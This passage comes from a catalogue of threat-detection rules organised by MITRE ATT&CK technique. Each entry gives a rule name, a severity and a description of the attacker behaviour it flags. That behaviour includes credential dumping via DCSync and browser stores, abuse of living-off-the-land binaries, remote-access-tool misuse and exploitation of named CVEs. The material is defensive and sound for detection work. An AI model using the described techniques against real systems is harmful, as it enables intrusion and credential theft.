    Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG - Level: medium
    Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
  • Potentially Suspicious ODBC Driver Registered - Level: high
    Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
  • Access To Browser Credential Files By Uncommon Applications - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information.
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
  • Dumping ntds.dit remotely via DCSync - Level: medium
    Description: ntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol
  • Dumping ntds.dit remotely via NetSync - Level: medium
    Description: ntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
attack.t1202 40
Show Rules (40)
  • Indirect Command Exectuion via Forfiles - Level: medium
    Description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
  • Indirect Command Execution - Level: low
    Description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
  • Execute MSDT.EXE Using Diagcab File - Level: high
    Description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
  • Winword.exe Loads Suspicious DLL - Level: medium
    Description: Detects Winword.exe loading a custom DLL using the /l flag
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE - Level: high
    Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
  • Troubleshooting Pack Cmdlet Execution - Level: medium
    Description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)
  • Indirect Inline Command Execution Via Bash.EXE - Level: medium
    Description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
  • Indirect Command Execution From Script File Via Bash.EXE - Level: medium
    Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Potential Arbitrary File Download Via Cmdl32.EXE - Level: medium
    Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
  • Suspicious High IntegrityLevel Conhost Legacy Option - Level: informational
    Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
  • Uncommon Child Process Of Conhost.EXE - Level: medium
    Description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
  • Potential Arbitrary Command Execution Via FTP.EXE - Level: medium
    Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
  • Suspicious ZipExec Execution - Level: medium
    Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
  • Suspicious Runscripthelper.exe - Level: medium
    Description: Detects execution of powershell scripts via Runscripthelper.exe
  • Potential Arbitrary Command Execution Using Msdt.EXE - Level: high
    Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
  • Suspicious Cabinet File Execution Via Msdt.EXE - Level: medium
    Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
  • Potential Arbitrary File Download Using Office Application - Level: high
    Description: Detects potential arbitrary file download using a Microsoft Office application
  • Potentially Suspicious Office Document Executed From Trusted Location - Level: high
    Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Level: high
    Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
  • Suspicious Remote Child Process From Outlook - Level: high
    Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
  • Potential Arbitrary DLL Load Using Winword - Level: medium
    Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
  • Renamed CURL.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed FTP.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
  • Renamed NirCmd.EXE Execution - Level: high
    Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
  • Renamed PAExec Execution - Level: high
    Description: Detects execution of renamed version of PAExec. Often used by attackers
  • Renamed PingCastle Binary Execution - Level: high
    Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
  • Rundll32 Execution Without CommandLine Parameters - Level: high
    Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
  • Uncommon Child Process Of Setres.EXE - Level: high
    Description: Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
  • Suspicious Splwow64 Without Params - Level: high
    Description: Detects suspicious Splwow64.exe process without any command line parameters
  • Suspicious Service Binary Directory - Level: high
    Description: Detects a service binary running in a suspicious directory
  • Potential Binary Impersonating Sysinternals Tools - Level: medium
    Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
  • Potentially Suspicious Child Process Of VsCode - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
  • WSL Child Process Anomaly - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
  • Windows Binary Executed From WSL - Level: medium
    Description: Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
  • Custom File Open Handler Executes PowerShell - Level: high
    Description: Detects the abuse of custom file open handler, executing powershell
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
attack.t1219 40
Show Rules (40)
  • Antivirus Exploitation Framework Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Potential Linux Amazon SSM Agent Hijacking - Level: medium
    Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
  • Atera Agent Installation - Level: high
    Description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
  • Potential Remote Desktop Connection to Non-Domain Host - Level: medium
    Description: Detects logons using NTLM to hosts that are potentially not part of the domain.
  • Mesh Agent Service Installation - Level: medium
    Description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers
  • TacticalRMM Service Installation - Level: medium
    Description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.
  • DNS Query To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • DNS Query To Remote Access Software Domain From Non-Browser App - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • TeamViewer Domain Query By Non-TeamViewer Application - Level: medium
    Description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)
  • Suspicious Binary Writes Via AnyDesk - Level: high
    Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
  • Anydesk Temporary Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • GoToAssist Temporary Installation Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • HackTool - Inveigh Execution Artefacts - Level: critical
    Description: Detects the presence and execution of Inveigh via dropped artefacts
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators - Level: high
    Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
  • Installation of TeamViewer Desktop - Level: medium
    Description: TeamViewer_Desktop.exe is create during install
  • ScreenConnect Temporary Installation Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • TeamViewer Remote Session - Level: medium
    Description: Detects the creation of log files during a TeamViewer remote session
  • Hijack Legit RDP Session to Move Laterally - Level: high
    Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
  • Remote Access Tool - AnyDesk Incoming Connection - Level: medium
    Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
  • Mstsc.EXE Execution With Local RDP File - Level: low
    Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
  • Suspicious Mstsc.EXE Execution With Local RDP File - Level: high
    Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
  • QuickAssist Execution - Level: low
    Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
  • Remote Access Tool - AnyDesk Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - AnyDesk Piped Password Via CLI - Level: medium
    Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
  • Remote Access Tool - AnyDesk Silent Installation - Level: high
    Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
  • Remote Access Tool - Anydesk Execution From Suspicious Folder - Level: high
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral - Level: medium
    Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
  • Remote Access Tool - NetSupport Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - GoToAssist Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - LogMeIn Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - ScreenConnect Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution - Level: medium
    Description: Detects potentially suspicious child processes launched via the ScreenConnect client service.
  • Remote Access Tool - Simple Help Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - UltraViewer Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Potential Amazon SSM Agent Hijacking - Level: medium
    Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
  • Suspicious TSCON Start as SYSTEM - Level: high
    Description: Detects a tscon.exe start as LOCAL SYSTEM
  • Use of UltraVNC Remote Access Software - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
  • Potential SocGholish Second Stage C2 DNS Query - Level: high
    Description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic
  • Potential CSharp Streamer RAT Loading .NET Executable Image - Level: high
    Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions - Level: medium
    Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. Hunting Opportunity 1- Weed Out The Noise When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
attack.t1068 34
Show Rules (34)
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
  • Usage Of Malicious POORTRY Signed Driver - Level: high
    Description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via their names only.
  • Hurricane Panda Activity - Level: high
    Description: Detects Hurricane Panda Activity
  • Possible Coin Miner CPU Priority Param - Level: critical
    Description: Detects command line parameter very often used with coin miners
  • Buffer Overflow Attempts - Level: high
    Description: Detects buffer overflow attempts in Unix system log files
  • Nimbuspwn Exploitation - Level: high
    Description: Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
  • Malicious Driver Load - Level: high
    Description: Detects loading of known malicious drivers via their hash.
  • Malicious Driver Load By Name - Level: medium
    Description: Detects loading of known malicious drivers via the file name of the drivers.
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via the file name of the drivers.
  • Vulnerable Driver Load - Level: high
    Description: Detects loading of known vulnerable drivers via their hash.
  • Process Explorer Driver Creation By Non-Sysinternals Binary - Level: high
    Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
  • Process Monitor Driver Creation By Non-Sysinternals Binary - Level: medium
    Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
  • HackTool - SysmonEOP Execution - Level: critical
    Description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
  • Suspicious Spool Service Child Process - Level: high
    Description: Detects suspicious print spool service (spoolsv.exe) child processes.
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event - Level: critical
    Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
  • Potential SystemNightmare Exploitation Attempt - Level: critical
    Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
  • Potential Zerologon (CVE-2020-1472) Exploitation - Level: high
    Description: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
  • CVE-2021-3156 Exploitation Attempt - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
  • CVE-2021-3156 Exploitation Attempt Bruteforcing - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing. required to trigger the heap-based buffer overflow.
  • Potential CVE-2021-4034 Exploitation Attempt - Level: high
    Description: Detects exploitation attempt of the vulnerability described in CVE-2021-4034.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level
attack.t1033 33
Show Rules (33)
  • Run Whoami as SYSTEM - Level: high
    Description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
  • Possible DCSync Attack - Level: high
    Description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
  • SharpHound Recon Sessions - Level: high
    Description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
  • System Owner or User Discovery - Linux - Level: low
    Description: Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
  • ESXi Network Configuration Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
  • ESXi Storage Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
  • ESXi System Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
  • ESXi VM List Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
  • ESXi VSAN Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Get-ADUser Enumeration Using UserAccountControl Flags - Level: medium
    Description: Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell - Level: medium
    Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
  • Suspicious PowerShell Get Current User - Level: low
    Description: Detects the use of PowerShell to identify the current logged user.
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell - Level: medium
    Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
  • HackTool - SharpLdapWhoami Execution - Level: high
    Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - Level: medium
    Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
  • User Discovery And Export Via Get-ADUser Cmdlet - Level: medium
    Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
  • Renamed Whoami Execution - Level: critical
    Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
  • Local Accounts Discovery - Level: low
    Description: Local accounts, System Owner/User discovery using operating systems utilities
  • WhoAmI as Parameter - Level: high
    Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Enumerate All Information With Whoami.EXE - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/all" flag
  • Whoami Utility Execution - Level: low
    Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
  • Whoami.EXE Execution From Privileged Process - Level: high
    Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
  • Group Membership Reconnaissance Via Whoami.EXE - Level: medium
    Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
  • Whoami.EXE Execution With Output Option - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
  • Whoami.EXE Execution Anomaly - Level: medium
    Description: Detects the execution of whoami.exe with suspicious parent processes.
  • Security Privileges Enumeration Via Whoami.EXE - Level: high
    Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex acitvity via specific process patterns
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1082 33
Show Rules (33)
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
  • System Information Discovery - Auditd - Level: low
    Description: Detects System Information Discovery commands
  • System and Hardware Information Discovery - Level: informational
    Description: Detects system information discovery commands
  • OS Architecture Discovery Via Grep - Level: low
    Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
  • Potential GobRAT File Discovery Via Grep - Level: high
    Description: Detects the use of grep to discover specific files created by the GobRAT malware
  • Container Residence Discovery Via Proc Virtual FS - Level: low
    Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
  • Docker Container Discovery Via Dockerenv Listing - Level: low
    Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
  • Potential Container Discovery Via Inodes Listing - Level: low
    Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
  • System Information Discovery - Level: informational
    Description: Detects system information discovery commands
  • System Information Discovery Using Ioreg - Level: medium
    Description: Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
  • System Information Discovery Using sw_vers - Level: medium
    Description: Detects the use of "sw_vers" for system information discovery
  • System Information Discovery Via Sysctl - MacOS - Level: medium
    Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
